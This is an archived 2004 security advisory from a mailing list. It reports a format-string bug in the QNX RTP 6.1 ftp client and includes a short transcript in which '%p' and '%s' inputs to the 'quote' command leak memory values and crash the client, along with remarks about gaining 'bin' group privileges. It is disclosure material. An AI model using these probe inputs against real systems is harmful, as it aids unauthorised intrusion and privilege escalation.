lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200409131915.i8DJFbP04622@netsys.com>
From: julio at rfdslabs.com.br (Julio Cesar Fort)
Subject: QNX BUG FESTIVAL -- [RLSA_03-2004] QNX ftp client format string bug

*** rfdslabs security advisory ***

Title: QNX ftp client format string bug [RLSA_03-2004]
Versions: QNX RTP 6.1 (possibly others)
Vendor: http://www.qnx.com
Date: 13 Sep 2004

Author: Julio Cesar Fort <julio at rfdslabs com br>


1. Introduction

"QNX Software Systems has provided OS technology, development tools, and
pro-
fessional services to companies building mission-critical embedded systems.
Since 1980 manufacturers have relied on QNX OS technology to power their
missioncritical applications - everything from medical instruments and
Internet
routers to telematics devices, 9-1-1 call centers, process control
applications
and air traffic control systems. Small or large, simple or distributed,
these
systems share an unmatched reputation for operating 24 hours a day, 365 days
a
year, nonstop." (from http://www.qnx.com/products/rtos)


2. Details

QNX 6.1 ftp client is vulnerable to a format string in 'quote' command.
If sucessfuly exploited, memory corruption occours and attackers can obtain
'bin' group priviledges. This kind of priviledge can be useful for
backdooring
purposes, as an evil example.

# ftp 127.0.0.1
Connected to 127.0.0.1.
220 sandimas FTP server (Version 5.60) ready.
Name (127.0.0.1:root): sandimas
331 Password required for sandimas.
Password:
230 User sandimas logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote site exec "%p.%p.%p.%p"
500 'SITE EXEC 805b730.0.0.805b180': command not understood.
ftp> quote "%s.%s.%s.%s"
Memory fault (core dumped)
#


3. Solution

QNX Software Systems was contacted in september 8th but vendor didn't reply.
It seems they don't care much about security (they don't even have a
security
staff e-mail, but SALES e-mail adddress is everywhere at qnx.com!).


4. Timeline

15 Aug 2004: Vulnerability detected;
08 Sep 2004: rfdslabs contacts QNX: no success;

Thanks to DataStorm Technologies and some stranger in mobius.qnx.com who was
intersted in rfdslabs.com.br.

www.rfdslabs.com.br - computers, sex, humand mind and more
Recife, PE, Brazil

________________________________________________
Message
sent using UebiMiau 2.7.2


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ